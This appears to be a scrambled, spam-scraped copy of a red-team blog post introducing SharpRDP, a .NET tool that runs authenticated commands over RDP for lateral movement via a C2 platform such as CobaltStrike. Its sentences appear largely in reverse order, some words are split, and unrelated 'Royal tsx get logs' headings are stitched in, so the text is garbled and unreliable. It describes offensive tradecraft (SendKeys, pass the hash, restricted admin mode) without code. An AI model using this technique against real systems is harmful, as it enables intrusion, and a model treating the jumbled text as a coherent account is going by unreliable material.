Once authenticated, the SharpRDP sends virtual keystrokes to the remote system via a method called SendKeys. This has commonly been abused for pass the hash with RDP.
#Royal tsx get logs windows
Restricted admin mode is a Windows protection mechanism that performs a network type logon rather than interactive to prevent the caching of credentials when RDPing to a host. There are two ways to authenticate, by either providing plain text credentials (likely the most common and usable scenario) or by current user context with restricted admin mode. From this form, we can call methods to perform actions needed for all of the lateral movement steps such as:Įach of these actions are registered as events and event handlers that determine the course of action to be taken. Windows forms are used during terminal services connection object instantiation and because of this we create a Windows form object that is invisible to a user to which we are executing from.
Both DLLs contain classes that are required to perform the actions needed for lateral movement.įigure 1 - SharpRDP execution through CobaltStrike MSTSCLib.dll contains the managed definitions for the library while the AxMSTSCLib.dll contains the Windows Form control for the ActiveX classes. NET SDK, is required to generate the appropriate DLLs MSTSCLib.DLL and AxMSTSCLib.DLL from the mstscax.dll DLL. The ActiveX importer aximp.exe, which is part of the. SharpRDP relies on the non-scriptable control of the COM library.
The terminal services library (mstscax.dll) has two different forms that can leveraged, the scriptable control that can be used by web client or scripts and the non-scriptable control that would be used in native or managed code. NET console application that can be used to perform authenticated command execution against a remote target for the purposes of lateral movement. Today, I’m releasing SharpRDP, a tool that is a. By leveraging this DLL, an operator can create a console application that performs authenticated remote command execution through the RDP without the need of a GUI client or SOCKS proxy. This DLL is an ActiveX COM library for Microsoft Terminal Services. Ultimately, I discovered Windows has a library mstscax.dll that gives access to any possible RDP action and is used by virtually all RDP clients, including Remote Desktop Connection or Royal TSX.
#Royal tsx get logs code
After compiling disparate information and bits of code and discussing the topic with coworkers, I had a starting point to work with.
While searching for existing work, I found several message boards and forums where people mentioned the idea and posted small code snippets but I never found a fully weaponized version. The idea of performing RDP lateral movement through an existing C2 channel without a SOCKS proxy or GUI RDP client always seemed possible but wasn’t really publicly talked about. Doing this has always felt like unnecessary overhead to perform one action. When using RDP for lateral movement, an operator will typically start a SOCKS proxy, use an RDP application/client, execute a payload, and close out the session.
#Royal tsx get logs how to
I’ll show how to leverage the Remote Desktop Protocol (RDP) for the purposes of non-graphical authenticated remote command execution against a target. This post doesn’t highlight a new lateral movement technique but instead offers a new way to leverage a known method in your favorite Command and Control (C2) platform. However, there are only a handful of publicly known techniques that are typically used. It’s no secret that attackers are looking for new techniques to execute lateral movement.
0 kommentar(er)
